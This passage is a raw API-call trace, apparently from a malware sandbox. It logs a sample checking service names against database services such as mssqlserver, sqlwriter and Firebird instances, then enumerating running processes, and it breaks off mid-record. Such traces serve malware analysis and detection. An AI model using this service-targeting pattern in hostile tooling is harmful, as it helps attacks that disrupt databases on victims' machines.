lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0173.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0173.609] lstrlenW (lpString="SecurityHealthService") returned 21 [0173.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0173.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0173.609] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0173.609] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0173.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0173.609] lstrlenW (lpString="SENS") returned 4 [0173.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0173.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0173.609] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0173.609] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0173.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0173.609] lstrlenW (lpString="ShellHWDetection") returned 16 [0173.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0173.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0173.609] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0173.609] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0173.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0173.609] lstrlenW (lpString="Spooler") returned 7 [0173.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0173.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0173.609] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0173.609] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0173.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0173.610] lstrlenW (lpString="sppsvc") returned 6 [0173.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0173.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0173.610] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0173.610] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0173.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0173.610] lstrlenW (lpString="SSDPSRV") returned 7 [0173.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0173.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0173.610] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0173.610] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0173.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0173.610] lstrlenW (lpString="StateRepository") returned 15 [0173.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0173.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0173.610] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0173.610] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0173.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0173.610] lstrlenW (lpString="SysMain") returned 7 [0173.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0173.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0173.610] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0173.610] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0173.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0173.610] lstrlenW (lpString="SystemEventsBroker") returned 18 [0173.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0173.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0173.610] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0173.611] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0173.611] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x32c9280 | out: hHeap=0x710000) returned 1 [0173.611] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x348 [0173.620] Process32FirstW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.620] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0173.621] lstrlenW (lpString="System") returned 6 [0173.621] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0173.622] lstrlenW (lpString="smss.exe") returned 8 [0173.622] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.623] lstrlenW (lpString="csrss.exe") returned 9 [0173.623] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0173.623] lstrlenW (lpString="wininit.exe") returned 11 [0173.623] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.624] lstrlenW (lpString="csrss.exe") returned 9 [0173.624] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0173.624] lstrlenW (lpString="winlogon.exe") returned 12 [0173.624] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0173.625] lstrlenW (lpString="services.exe") returned 12 [0173.625] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0173.626] lstrlenW (lpString="lsass.exe") returned 9 [0173.626] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.626] lstrlenW (lpString="svchost.exe") returned 11 [0173.626] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0173.627] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0173.627] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0173.627] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0173.627] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.628] lstrlenW (lpString="svchost.exe") returned 11 [0173.628] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0173.628] lstrlenW (lpString="dwm.exe") returned 7 [0173.628] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x58, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.629] lstrlenW (lpString="svchost.exe") returned 11 [0173.629] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.629] lstrlenW (lpString="svchost.exe") returned 11 [0173.629] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.630] lstrlenW (lpString="svchost.exe") returned 11 [0173.630] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.630] lstrlenW (lpString="svchost.exe") returned 11 [0173.630] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.631] lstrlenW (lpString="svchost.exe") returned 11 [0173.631] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.631] lstrlenW (lpString="svchost.exe") returned 11 [0173.631] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.632] lstrlenW (lpString="svchost.exe") returned 11 [0173.632] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.632] lstrlenW (lpString="svchost.exe") returned 11 [0173.632] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.633] lstrlenW (lpString="svchost.exe") returned 11 [0173.633] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.633] lstrlenW (lpString="svchost.exe") returned 11 [0173.634] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0173.634] lstrlenW (lpString="spoolsv.exe") returned 11 [0173.634] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.635] lstrlenW (lpString="svchost.exe") returned 11 [0173.635] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0173.635] lstrlenW (lpString="audiodg.exe") returned 11 [0173.635] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0173.636] lstrlenW (lpString="sihost.exe") returned 10 [0173.636] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.636] lstrlenW (lpString="svchost.exe") returned 11 [0173.636] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0173.637] lstrlenW (lpString="taskhostw.exe") returned 13 [0173.637] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.637] lstrlenW (lpString="explorer.exe") returned 12 [0173.637] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0173.638] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0173.638] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0173.638] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0173.638] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0173.639] lstrlenW (lpString="Memory Compression") returned 18 [0173.639] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0173.640] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0173.640] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0173.640] lstrlenW (lpString="SearchUI.exe") returned 12 [0173.640] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0173.641] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0173.641] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.641] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0173.641] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending_windsor_bouquet.exe")) returned 1 [0173.642] lstrlenW (lpString="pending_windsor_bouquet.exe") returned 27 [0173.642] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers.exe")) returned 1 [0173.642] lstrlenW (lpString="workers.exe") returned 11 [0173.642] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed.exe")) returned 1 [0173.643] lstrlenW (lpString="succeed.exe") returned 11 [0173.643] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="washer jar.exe")) returned 1 [0173.643] lstrlenW (lpString="washer jar.exe") returned 14 [0173.643] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights_attending_other.exe")) returned 1 [0173.644] lstrlenW (lpString="nights_attending_other.exe") returned 26 [0173.644] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="useful_courts.exe")) returned 1 [0173.645] lstrlenW (lpString="useful_courts.exe") returned 17 [0173.645] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="compounds spanish.exe")) returned 1 [0173.645] lstrlenW (lpString="compounds spanish.exe") returned 21 [0173.645] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="look-albuquerque-left.exe")) returned 1 [0173.646] lstrlenW (lpString="look-albuquerque-left.exe") returned 25 [0173.646] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="try.exe")) returned 1 [0173.646] lstrlenW (lpString="try.exe") returned 7 [0173.646] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="statuteide.exe")) returned 1 [0173.647] lstrlenW (lpString="statuteide.exe") returned 14 [0173.647] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0173.647] lstrlenW (lpString="invite.exe") returned 10 [0173.647] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="register voluntary fluid.exe")) returned 1 [0173.648] lstrlenW (lpString="register voluntary fluid.exe") returned 28 [0173.648] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="cope finances ringtones.exe")) returned 1 [0173.648] lstrlenW (lpString="cope finances ringtones.exe") returned 27 [0173.648] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="modules_recommend.exe")) returned 1 [0173.649] lstrlenW (lpString="modules_recommend.exe") returned 21 [0173.649] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazinedeletecomparisons.exe")) returned 1 [0173.649] lstrlenW (lpString="magazinedeletecomparisons.exe") returned 29 [0173.649] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.650] lstrlenW (lpString="svchost.exe") returned 11 [0173.650] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0173.650] lstrlenW (lpString="3dftp.exe") returned 9 [0173.650] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0173.651] lstrlenW (lpString="absolutetelnet.exe") returned 18 [0173.651] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0173.651] lstrlenW (lpString="alftp.exe") returned 9 [0173.652] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0173.652] lstrlenW (lpString="barca.exe") returned 9 [0173.652] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0173.653] lstrlenW (lpString="bitkinex.exe") returned 12 [0173.653] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, 